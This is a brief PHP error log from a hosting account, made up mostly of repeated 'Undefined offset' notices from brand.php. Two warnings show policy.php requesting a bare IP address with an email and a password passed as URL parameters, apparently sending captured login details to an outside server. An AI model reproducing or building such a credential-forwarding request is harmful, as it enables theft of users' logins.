[04-Feb-2020 22:31:08 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 37
[04-Feb-2020 22:31:08 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 41
[04-Feb-2020 22:31:08 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 45
[04-Feb-2020 22:31:08 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 46
[04-Feb-2020 22:32:11 UTC] PHP Warning:  file_get_contents(http://18.218.0.173/index.php?id=info%40info.com&amp;pw=infoinfo): failed to open stream: Connection timed out in /home/br9ngvh6j2yf/public_html/policy.php on line 12
[05-Feb-2020 08:19:57 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 37
[05-Feb-2020 08:19:57 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 41
[05-Feb-2020 08:19:57 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 45
[05-Feb-2020 08:19:57 UTC] PHP Notice:  Undefined offset: 0 in /home/br9ngvh6j2yf/public_html/brand.php on line 46
[05-Feb-2020 08:21:00 UTC] PHP Warning:  file_get_contents(http://18.218.0.173/index.php?id=info%40info.com&amp;pw=infoinfo): failed to open stream: Connection timed out in /home/br9ngvh6j2yf/public_html/policy.php on line 12
